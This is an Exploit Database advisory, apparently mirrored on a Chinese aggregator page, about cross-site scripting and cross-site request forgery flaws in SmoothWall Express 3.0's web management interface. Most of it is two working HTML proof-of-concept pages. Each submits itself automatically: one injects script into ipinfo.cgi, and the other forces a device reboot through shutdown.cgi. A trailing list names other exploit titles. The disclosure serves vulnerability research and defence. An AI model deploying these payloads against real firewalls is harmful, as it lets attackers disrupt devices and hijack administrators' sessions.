SmoothWall Express 3.0 – Multiple Vulnerabilities

Exploit Database
85 阅读

作者： dave b

日期： 2011-01-17
类别：
- webapps
平台：
- cgi
来源：https://www.exploit-db.com/exploits/16006/

The web management interface of SmoothWall Express 3.0 is vulnerable
to xss and csrf.

xss example:

<html>
<title> SmoothWall Express 3.0 xss </title>
<body>
 <form action="http://192.168.0.1:81/cgi-bin/ipinfo.cgi"; method="post"
id="xssplz">
<input type="hidden" name="IP" value='"<script>alert(1);</script>'></input>
<input type="hidden" name="ACTION" value='Run'></input>
</form>
<script>document.getElementById("xssplz").submit();</script>
</body>


csrf example:

<html>
<title>SmoothWall Express 3.0 csrf </title>
<body>
 <form action="http://192.168.0.1:81/cgi-bin/shutdown.cgi";
method="post" id="csrfplz">
<input type="hidden" name="ACTION" value='Reboot'></input>
</form>
<script>document.getElementById("csrfplz").submit();</script>
</body>

last Exploits
SmoothWall Express 3.0 – Multiple Vulnerabilities的更多信息

Tiki Wiki 15.1 – File Upload：
Young Entrepreneur E-Negosyo System 1.0 – ‘PRODESC’ Stored Cross-Site Scripting (XSS)：
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak：
Honeywell IP-Camera HICC-1100PT – Credentials Disclosure：
Xivo 1.2 – Arbitrary File Download：
NUUO NVRmini – ‘upgrade_handle.php’ Remote Command Execution：
Teradek Slice 7.3.15 – Cross-Site Request Forgery：
LiveInvoices 1.0 – SQL Injection：